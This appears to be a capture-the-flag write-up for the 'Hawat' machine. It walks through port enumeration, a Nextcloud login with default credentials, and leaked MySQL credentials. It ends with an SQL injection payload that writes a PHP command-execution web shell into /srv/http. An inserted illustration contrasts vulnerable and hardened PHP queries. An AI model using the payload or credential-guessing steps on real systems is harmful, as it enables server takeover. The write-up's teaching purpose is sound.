
Hawat 🔹

Enumeration

Port 17445 serves the web front end of an issue tracker.

We can register users and log in.

Port 30455 serves a web page with no links.

Directory brute-forcing with feroxbuster reveals a Nextcloud instance.

Trying admin:admin works.

The source project of the issue tracker is stored in there.

Downloading and exploring it gives us the MySQL credentials:

issue_user:ManagementInsideOld797

Reading the source, we can see that the priority parameter handled by the checkByPriority function is injectable.
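The bug class in one picture, as an added illustration that is not the Hawat tracker's actual code: a hypothetical checkByPriority that concatenates the user-supplied priority into the query, next to a hardened version using an allow-list and a PDO prepared statement (table and column names are assumed; SQLite in memory stands in for MySQL so it runs offline).

```php
<?php
// Added illustration, not the issue tracker's real source. Assumes a table
// `issues` with a `priority` column reached through PDO.

// Vulnerable pattern: the user-controlled value is spliced into the SQL
// text, so a quote ends the literal and the rest of the input runs as SQL.
// On MySQL this is what lets a UNION ... INTO OUTFILE drop a file, provided
// the DB account holds FILE privilege and secure_file_priv does not restrict
// it; the application account should have neither.
function checkByPriorityVulnerable(PDO $db, string $priority): array
{
    $sql = "SELECT id, title FROM issues WHERE priority = '" . $priority . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: the value is bound as a parameter, so it is always data
// and never SQL, and an allow-list rejects unknown priorities up front.
const ALLOWED_PRIORITIES = ['low', 'medium', 'high', 'critical'];

function checkByPriority(PDO $db, string $priority): array
{
    if (!in_array($priority, ALLOWED_PRIORITIES, true)) {
        throw new InvalidArgumentException('unknown priority');
    }
    $stmt = $db->prepare('SELECT id, title FROM issues WHERE priority = :priority');
    $stmt->execute([':priority' => $priority]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Self-contained demo: constructed rows in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE issues (id INTEGER PRIMARY KEY, title TEXT, priority TEXT)');
$db->exec("INSERT INTO issues (title, priority) VALUES ('Login broken', 'high'), ('Typo', 'low')");

// Constructed probe input: a stray quote plus a tautology.
$probe = "x' OR '1'='1";

// Vulnerable: the WHERE clause becomes always-true and every row comes back.
echo 'vulnerable returned ' . count(checkByPriorityVulnerable($db, $probe)) . " rows\n";

// Hardened: the same input is rejected before any SQL is built.
try {
    checkByPriority($db, $probe);
} catch (InvalidArgumentException $e) {
    echo 'hardened rejected input: ' . $e->getMessage() . "\n";
}

// Legitimate input still works through the prepared statement.
echo 'hardened returned ' . count(checkByPriority($db, 'high')) . " rows for 'high'\n";
```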

So, back to the web application.

GET is not allowed, so perhaps POST. Capture the request with Caido.

Changing GET to POST and adding the priority parameter, we get a 200.

feroxbuster also found a phpinfo page, which reveals the document root as /srv/http, so we can write a web shell there through the injection.

The injected payload:

' union select '<?php echo system($_REQUEST["bingo"]); ?>' into outfile '/srv/http/cmd.php' -- -

URL-encode it with https://www.url-encode-decode.com/ before sending.

Then access the path of the written file.

Post Exploitation

Get the flag.